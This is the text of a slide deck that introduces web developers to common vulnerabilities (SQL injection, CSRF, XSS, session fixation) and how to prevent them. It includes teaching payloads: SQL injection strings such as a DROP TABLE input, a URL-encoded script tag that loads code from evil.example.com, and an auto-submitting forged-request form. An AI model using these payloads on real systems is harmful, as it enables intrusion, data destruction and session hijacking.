Slide 1
Slide 1 text
Security basics for
web developers
Christoph Iserlohn
Slide 2
Slide 2 text
About me
Senior Consultant @ innoQ
MacPorts Team member
Slide 3
Slide 3 text
Why is security so important?
> Adobe – September 2013
152.000.000 records leaked including encrypted
passwords and encrypted credit card numbers
and expiration dates
> Korea Credit Bureau – January 2014
20,000,000 records leaked including social security
numbers, phone numbers, credit card numbers
and expiration dates
> „The Fappening“ – September 2014
intimate-images from over hundred celebrities
leaked
Slide 4
Slide 4 text
Agenda
Common vulnerabilities
in web applications
...and how to prevent them
Slide 5
Slide 5 text
OWASP Top 10
> A1 Injection
> A2 Broken Authentication and Session Management
> A3 Cross-Site Scripting (XSS)
> A4 Insecure Direct Object References
> A5 Security Misconfiguration
> A6 Sensitive Data Exposure
> A7 Missing Function Level Access Control
> A8 Cross-Site Request Forgery (CSRF)
> A9 Using Components with Known Vulnerabilities
> A10 Unvalidated Redirects and Forwards
Slide 6
Slide 6 text
OWASP Top 10
> A1 Injection
> A2 Broken Authentication and Session Management
> A3 Cross-Site Scripting (XSS)
> A4 Insecure Direct Object References
> A5 Security Misconfiguration
> A6 Sensitive Data Exposure
> A7 Missing Function Level Access Control
> A8 Cross-Site Request Forgery (CSRF)
> A9 Using Components with Known Vulnerabilities
> A10 Unvalidated Redirects and Forwards
Slide 7
Slide 7 text
Injection attacks
Slide 8
Slide 8 text
Injection explained
> Untrusted data is sent to an interpreter
> The interpreter is tricked into
executing unintended commands
> Problem: no clear separation of
(untrusted) data from commands
Slide 9
Slide 9 text
SQL-Injection
“Exploits of a Mom“ – by Randall Munroe. Licensed under CC BY-NC 2.5
Slide 10
Slide 10 text
Example
String user = request.getParameter("user");!
String pwd = request.getParameter("pwd");!
String query = !
"SELECT * FROM user WHERE name = '" +!
user + "' AND pwd = '" + pwd + "'";!
Statement stmnt = conn.createStatement();!
ResultSet rs = stmnt.executeQuery(query);!
Slide 11
Slide 11 text
Example
Parameters chosen by attacker:
name = admin
pwd = ' OR 1=1; --
Query that gets executed:
SELECT * FROM users WHERE
name = 'admin'
AND pwd = '' OR 1=1; --‘
Slide 12
Slide 12 text
Example
Parameters chosen by attacker:
name = admin
pwd = '; DROP TABLE users; --
Query that gets executed:
SELECT * FROM user WHERE
name = 'admin' AND pwd = ''; DROP
TABLE users; --'
Slide 13
Slide 13 text
NoSQL
=
No injection ?
Slide 14
Slide 14 text
NoSQL
=
No injection ?
Slide 15
Slide 15 text
NoSQL query languages
session.execute("
SELECT * FROM users WHERE
first_name = 'jane' AND
last_name = 'smith';");
! ! ! ! ! ! ! ! ! ! !Cassandra – CQL
executionEngine.execute("
MATCH (p:Product) WHERE
p.productName = 'Chocolade'
RETURN p.unitPrice;");
Neo4j – cypher
Slide 16
Slide 16 text
NoSQL built-in interpreters
> MongoDB: JavaScript
> Redis: Lua
> CouchDB: JavaScript
> ...
Slide 17
Slide 17 text
Other attack vectors
> XML-Parsers, XPath
> Runtime.exec(),
ProcessBuilder()!
> SMTP-Headers, HTTP-Headers
> LDAP
> ...
Slide 18
Slide 18 text
Prevention
> Use parameterized interfaces –
e.g. prepared statements
> Validate user input – prefer whitelists
over blacklists
> Sanitize user input – escape special
characters sent to interpreter
Slide 19
Slide 19 text
Example
String user = request.getParameter("user");!
String pwd = request.getParameter("pwd");!
String query = !
"SELECT * FROM user WHERE name = ? " +
"AND pwd = ?";!
PreparedStatement stmnt =
conn.prepareStatement(query);!
stmnt.setString(1, user);
stmnt.setString(2, pwd);!
ResultSet rs = stmnt.executeQuery();!
Slide 20
Slide 20 text
Cross-Site
Request Forgery
Slide 21
Slide 21 text
> Attacker is able to predict all details
of a request required to execute a
particular action
> Malicious web page generates forged
requests that are indistinguishable
from legitimate ones
> Browsers send credentials like
session cookies automatically
CSRF explained
Slide 22
Slide 22 text
Meet our protagonists
Slide 23
Slide 23 text
The vulnerable web application
Slide 24
Slide 24 text
The victim
Slide 25
Slide 25 text
The attacker
Slide 26
Slide 26 text
The malicious website
Slide 27
Slide 27 text
The attacker tricks victim
to visit malicious website
Slide 28
Slide 28 text
GET / HTTP 1.1!
Host: evil.example.com!
Slide 29
Slide 29 text
GET / HTTP 1.1!
Host: evil.example.com!
HTTP 1.1 200 OK!
!
!
!
!
!
Slide 30
Slide 30 text
GET /transfer?from=victim&to=attacker&amount=100 HTTP 1.1!
Host: vulnerable.example.com!
Cookie: sessionID=48839ca9-a91f-aff3-df60-11147d694336!
HTTP 1.1 200 OK!
Vicitm‘s browser sends
forged request -
including session cookie
(if user is logged in)
Slide 31
Slide 31 text
GET /transfer?from=victim&to=attacker&amount=100 HTTP 1.1!
Host: vulnerable.example.com!
Cookie: sessionID=48839ca9-a91f-aff3-df60-11147d694336!
HTTP 1.1 200 OK!
Vicitm‘s browser sends
forged request -
including session cookie
(if user is logged in)
Slide 32
Slide 32 text
Vulnerable website thinks the request is
legitimate and executes the transaction
Slide 33
Slide 33 text
I‘m safe. I‘m using POST.
Slide 34
Slide 34 text
Safe. Really?
Slide 35
Slide 35 text
GET / HTTP 1.1!
Host: evil.example.com!
Slide 36
Slide 36 text
!
!
!
!
GET / HTTP 1.1!
Host: evil.example.com!
HTTP 1.1 200 OK!
Slide 37
Slide 37 text
GET / HTTP 1.1!
Host: evil.example.com!
HTTP 1.1 200 OK!
!
window.onload = function() {
document.getElementById("forged").submit();!
}!
!
Slide 38
Slide 38 text
GET / HTTP 1.1!
Host: evil.example.com!
HTTP 1.1 200 OK!
!
window.onload = function() {
document.getElementById("forged“).submit();!
}!
!
Slide 39
Slide 39 text
POST requests are not
immune to CSRF!
Slide 40
Slide 40 text
Just as multi-step interactions
are vulnerable!
Slide 41
Slide 41 text
Or Websocket connections!
Slide 42
Slide 42 text
Or your JSON-APIs!
Slide 43
Slide 43 text
Prevention
> Use CSRF-Tokens for each request –
unique/secret, linked to session
> Require reauthentication before
critical operations
> Use double submit pattern for
requests from JavaScript – or when
there is no session
> Check for application/json"
Slide 44
Slide 44 text
CSRF-Token example
Slide 45
Slide 45 text
GET /transfer!
Host: csrf-safe.example.com !
Everytime a user
requests a website
including a form
Slide 46
Slide 46 text
The form is enriched with
a unique CSRF-token
!
!
"
!
!
Slide 47
Slide 47 text
The form is enriched with
a unique CSRF-token
!
!
"
!
!
Slide 48
Slide 48 text
!
!
"
!
!
Attacker can‘t know
value of csrf
Slide 49
Slide 49 text
GET / HTTP 1.1!
Host: evil.example.com!
Slide 50
Slide 50 text
GET / HTTP 1.1!
Host: evil.example.com!
HTTP 1.1 200 OK!
!
!
"
!
!
Slide 51
Slide 51 text
GET / HTTP 1.1!
Host: evil.example.com!
HTTP 1.1 200 OK!
!
!
"
!
!
Slide 52
Slide 52 text
POST /transfer HTTP 1.1!
Host: csrf-safe.example.com!
Cookie: sessionID=48839ca9-a91f-aff3-df60-11147d694336!
!
from=victim&to=attacker&amount=100&csrf=????!
Vicitm‘s browser sends
forged request -
including session cookie
(if user is logged in)
Slide 53
Slide 53 text
Website checks the value of csrf
and rejects the forged request even
if it contains a valid session cookie
Slide 54
Slide 54 text
Cross-Site Scripting
Slide 55
Slide 55 text
XSS explained
> Web page includes user
supplied (untrusted) data
> The data is not properly
validated or escaped
> Attacker can execute scripts
in the victim‘s browser
Slide 56
Slide 56 text
Reflected XSS
Slide 57
Slide 57 text
Attacker crafts a special link:
http://vulnerable.example.com/?
q=cats
!
Slide 58
Slide 58 text
Attacker crafts a special link:
http://vulnerable.example.com/?
q=cats
!
Slide 59
Slide 59 text
Attacker crafts a special link:
http://vulnerable.example.com/?
q=cats%3Cscript%20src%3D%E2%80%9C
http%3A%2F%2Fevil.example.com%2Fpwn.js%E2%80%9C%2F%3E%0A
!
Slide 60
Slide 60 text
The attacker tricks victim
to click on malicious link
Slide 61
Slide 61 text
GET /?q=cats !
Host: vulnerable.example.com !
Vicitm‘s browser
sends request to
vulnerable website
Slide 62
Slide 62 text
Vulnerable website
includes the query
parameters in
the response
!
!
Results for cats
:!
!
!
Slide 63
Slide 63 text
Vulnerable website
includes the query
parameters in
the response
!
!
Results for cats
:!
!
!
Slide 64
Slide 64 text
Vicitm‘s browser
includes script from
malicious website
GET /pwn.js HTTP 1.1!
Host: evil.example.com!
!
!
Results for cats
:!
!
!
Slide 65
Slide 65 text
Vicitm‘s browser
executes script in
context of the
vulnerable website
!
!
Results for cats
:!
!
!
Slide 66
Slide 66 text
hijack victim‘s session
Slide 67
Slide 67 text
hijack victim‘s session
redirect user
Slide 68
Slide 68 text
hijack victim‘s session
insert hostile content
redirect user
Slide 69
Slide 69 text
Persistent XSS
Slide 70
Slide 70 text
I love cats!
Attacker injects script
directly into site content
(e.g. in a comment)
Slide 71
Slide 71 text
Vulnerable website
includes the malicious
script in every response
!
!
I love cats
!
!
!
Slide 72
Slide 72 text
hijack victim‘s session
insert hostile content
redirect user
Slide 73
Slide 73 text
hijack victim‘s session
insert hostile content
redirect user
All users
are affected
Slide 74
Slide 74 text
Other XSS types
> DOM-based XSS – reflected by
JavaScript code on the client side
> Universal XSS – exploit vulnerabilities
in the browser
Slide 75
Slide 75 text
Prevention
> Use contextual (HTML, JavaScript,
CSS) output escaping/encoding
> Validate & sanitize user input –
prefer whitelists over blacklists
> Protect session cookies with httpOnly"
> Use Content-Security-Policy
headers to limit where external
resources can be loaded from
Slide 76
Slide 76 text
Properly escaped
output
!
!
I love cats <script src="http://
evil.example.com/pwn.js" />!
!
!
Slide 77
Slide 77 text
Session Management
Slide 78
Slide 78 text
The threat
> Flaws in session management
allows an attacker to steal accounts
or impersonate users
Slide 79
Slide 79 text
Common flaws
> Session IDs are exposed in the URL
> Session IDs don‘t timeout
> Session IDs aren‘t changed
after logins
> Session IDs aren‘t invalidated
during logout
> Session IDs are predictable
Slide 80
Slide 80 text
Session fixation
Slide 81
Slide 81 text
Attacker establishes
a valid session
Slide 82
Slide 82 text
https://vulnerable.example.com/?ID=48839ca
!
Attacker gets
a session ID
Slide 83
Slide 83 text
https://vulnerable.example.com/?ID=48839ca
!
Attacker gets
a session ID
Slide 84
Slide 84 text
The attacker tricks victim to
login with the provided link
https://vulnerable.example.com/login?ID=48839ca!
Slide 85
Slide 85 text
The attacker tricks victim to
login with the provided link
https://vulnerable.example.com/login?ID=48839ca!
Slide 86
Slide 86 text
POST /login?ID=48839ca9!
Host: vulnerable.example.com!
!
user=joe&pwd=secret !
Victim logs into
vulnerable website
Slide 87
Slide 87 text
HTTP 1.1 303 See Other!
Location: https://vulnerable.example.com/?ID=48839ca!
Vulnerable website
doesn‘t create a
new session
Slide 88
Slide 88 text
Attacker knows victim‘s
session ID and has
access to his account
Slide 89
Slide 89 text
Prevention
> Store session IDs in cookies –
use httpOnly flag if possible
> Create a new session after login –
(see HttpServletRequest)!
> Properly invalidate sessions –
during logout or due to inactivity
> Use unpredictable session IDs –
(e.g. don‘t use java.util.Random)
Slide 90
Slide 90 text
Summary
> Validate & sanitize all user input
> Properly escape/encode output
> Protect your forms with CSRF-Tokens
> Harden your session management
Slide 91
Slide 91 text
Tools that can help
> Spring:
Spring framework, Spring security
> OWASP:
CSRFGuard, HTML Sanitizer, ESAPI
> Apache:
commons lang, commons validation
> JavaEE:
Bean validation (JSR-303), JSF (2.2)
Slide 92
Slide 92 text
Watch out for...
> Vulnerabilities in 3rd-party components
> Security (mis)configuration
> Proper access control